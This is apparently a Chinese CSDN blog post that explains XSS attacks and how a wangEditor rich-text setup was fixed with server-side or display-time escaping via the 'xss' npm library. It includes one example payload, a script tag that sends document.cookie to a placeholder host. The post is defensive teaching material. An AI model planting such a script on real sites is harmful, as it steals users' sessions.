bug-xss 攻击漏洞问题

已于 2023-11-14 18:29:08 修改
阅读量684 收藏
点赞数
分类专栏: bug 文章标签: bug xss 前端
于 2023-11-14 18:25:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42863883/article/details/134405002
版权

XSS 攻击漏洞是什么

XSS(Cross-Site Scripting)攻击:通过在网站上植入恶意脚本来攻击用户

举例说明

在留言板发布评论,评论内容包含恶意脚本:

<script>document.location = "http://xxx.com/getCookie?cookie=" + document.cookie;</script>

当用户看到评论时,就会触发响应,将用户cookie发送到攻击者手中

问题描述

前端使用wangeditor富文本编辑器,正常情况下编辑器都会把内容进行转码处理,转码之后就回避xss问题,这次的问题是通过一些手段提及内容(比如postman),这样提交的代码就没有经过编辑器进行转码,读取数据时就会触发恶意代码。

解决方法

  1. 方法一:后端拿到数据后,再进行一次转码,保障进入数据库的内容是转码后的;
  2. 方法二:读取后端数据后,对要展示的数据再进行一次转码,相当于保存和读取都进行转码。

转码工具

https://jsxss.com/zh/index.html

// 安装
npm i xss
// 引用
import filterXSS from 'xss'
const newStr=filterXSS(htmlStr); // 进行转码
web张
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
InjuredAndroid:一个易受攻击的Android应用程序,以ctf样式显示漏洞的简单示例
02-03
受伤的Android-CTF 带有ctf示例的易受攻击的Android应用程序,该示例基于漏洞赏金发现,利用概念和纯粹的创造力。 现在可以在Google Play上使用! 设置物理设备从发行版或Google Play下载最新版本Damagedandroid.apk...
Ueditor、FCKeditor、Kindeditor编辑器漏洞
网安君的博客
01-27 6048
UEditor是由百度web前端研发部开发的所见即所得的开源富文本编辑器,具有轻量、可定制、用户体验优秀等特点。Ueditor、FCKeditor、Kindeditor编辑器漏洞
webeditor漏洞基础知识
Coisini的博客
05-25 1063
eWebEditor eWebEditor利用基础知识 默认后台地址:/ewebeditor/admin_login.asp 建议最好检测下admin_style.asp文件是否可以直接访问 后台:admin/ewebeditor/admin_login.asp 数据库:admin/ewebeditor/db/ewebeditor.mdb 限制ASP 改成asaspp aaspsp ...
「newbee-mall新蜂商城开源啦」 页面优化,最新版 wangEditor 富文本编辑器整合案例...
程序员有故事
11-02 600
在开源项目达到一定规模时,社区就会给出非常多的反馈,想要开源保持长久的生命力和正向的影响力,定期维护和更新是十分必要的。同时,从另一个角度来说,这也是对该开源项目使用者负责。1新蜂商城开...
常见编辑器漏洞汇总【超全】(转载)
00勇士王子的博客
09-15 4457
以前挖某站发现使用了编辑器,想用通用漏洞探一探,奈何当时无从下手,这件事就放到了我的心上,就去学习了此方面的知识,了解了一些思路,把编辑器漏洞汇总到了一起,分享给想要了解这方面漏洞的小伙伴首先介绍什么是编辑器:编辑器是非常好用的网页在线编辑器,顾名思义就是让我们的用户可以在网页上进行文本的编辑,可以在网页上设置字体的样式段落行间距类似于用word编辑比较方便,并将工具生成得到的html样式插入到数据库中我们可以右键,审查元素,查看js 文件和文件内容标识。
富文本编辑器漏洞
weixin_33851604的博客
09-11 1552
.net 一般的富文本编辑器都是使用 一般处理程序上传图片或者文件的 那么黑客就可以利用开发者的疏忽(没有判断权限) 直接通过伪造表单上传经过他更改过的木马文件 伪装成.jpg(各种图片格式)。 提交 上传完成之后只要访问一下这个路径(上传完成后会返回)以上就是没有加权限判断导致的。任何人都能通过富文本编辑器上传文件为了防止这样事情的发生,我们做一下调整 我...
retire.js-crx插件
03-09
添加了jQuery mobile XSS漏洞版本1.3.0-添加了根据CVE-2019-11358版本1.2.9发布的jQuery漏洞-添加了两个原型污染Handlebars版本1.2.8中的vulns-添加了有关angularjs漏洞1.2.7的更多描述性链接-添加了有关Bootstrap...
phpcms-PHP
06-20
改由H5实现修复选择上传文件时未按配置的文件格式进行过滤的问题修复模型...xss攻击修复非超级管理员碎片列表展示不完全的问题修复后台sql注入漏洞修复利用url规则执行任意脚本漏洞修复全站利用篡改模板路径挂马的问题...
top25-parameter:对于基础研究,可以在自动化工具或手动侦查中使用的前25个漏洞参数。 :shield::crossed_swords::mage:
03-19
对于基础研究,根据使用频率(参考各篇文章),列出前25个易受攻击的参数。这些参数可用于自动化工具或手动侦察。尽管无法精确证明这些参数的普遍性百分比,但是它们是由我和我自己创建的TR Bug Hunters社区准备的。...
RGCMS睿谷信息管理系统-PHP
06-21
使用更直观更合理新增删除站点时自动清除当前站点Session新增栏目模型、功能内容、表单的内容列表设置默认排序字段及规则新增日期自定义字段的类型选择修复前台表单提交存在XSS漏洞修复UE编辑器插入动态地图不显示的...
eWebEditor Version 11.1 for ASP 多语言商业版 修改弹出窗口提示
02-10
eWebEditor Version 11.1 for ASP 多语言商业版 修改弹出窗口提示
网页编辑器漏洞大全
07-13
涵盖了诸如常见的FCKeditor、eWebEditor、Cuteditor、Freetextbox、Webhtmleditor、Kindeditor、所谓的eWebEditorNET、所谓的 southidceditor、所谓的bigcneditor
wangEditor的一些坑记录
HYeeee的博客
11-30 6393
1、在vue中使用wangEditor 网上的资料一堆,但基本都是wangEditor3的运用,wangEditor4只需要把customConfig 改成config即可。 例如:关于在vue项目中使用wangEditor 2、标题样式、斜体样式不生效 感谢文章:https://blog.csdn.net/weixin_44258964/article/details/103213167 原因:设置的全局样式导致样式失效 解决:重新对编辑器的样式进行设置,覆盖全局即可 通过查找原始默认样式:webkit内
使用wangEditor富文本编辑器遇到的问题总结
热门推荐
冰雪为融的博客
12-01 3万+
怎么使用和安装我就不详细说了,文档写得很清楚,https://www.kancloud.cn/wangfupeng/wangeditor3/332599 1、当屏幕缩时,富文本编辑器的选项会被隐藏,如下图官网的demo:当屏幕变小时,菜单选项就超出了富文本编辑器的区域,撤回和恢复已经隐藏不见了 原因,如果我们检查代码就会发现,其实富文本编辑器使用了弹性盒模型(不懂的百度,推荐阮一峰大神的文...
wangeditor富文本编辑器的一些坑
helixsky的博客
04-04 1万+
看到CSDN都在用wangeditor而且用起来的确简单,可是图片上传还是一直搞不定。 1.返回格式问题 官方要求返回json格式,先定义字典赋值,然后采用json.dumps(result,ensure_ascii=False)进行后端返回: { "errno": 0, "data": [ "图片1地址", "图片2地址", ...
富文本wangEditor成功应用到项目上案例
alice9999999的博客
11-07 2126
(1)隐藏textarea显示富文本 注:输入框中可输入@符号,选择系统用户以达到提醒某人的功能 (2)富文本的调用: var message_reminder_obj $(function (){ sessionStorage.removeItem("_key_"); sessionStorage.setItem("_key_", '用户体验水平概览'); //
element-ui xss漏洞
最新发布
06-08
Element-UI是一款基于Vue.js的UI组件库,其存在一个XSS漏洞攻击者可以通过构造恶意脚本来攻击用户。该漏洞是因为Element-UI在某些情况下没有对用户输入的内容进行充分的过滤和转义。为了解决这个问题,你可以升级...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值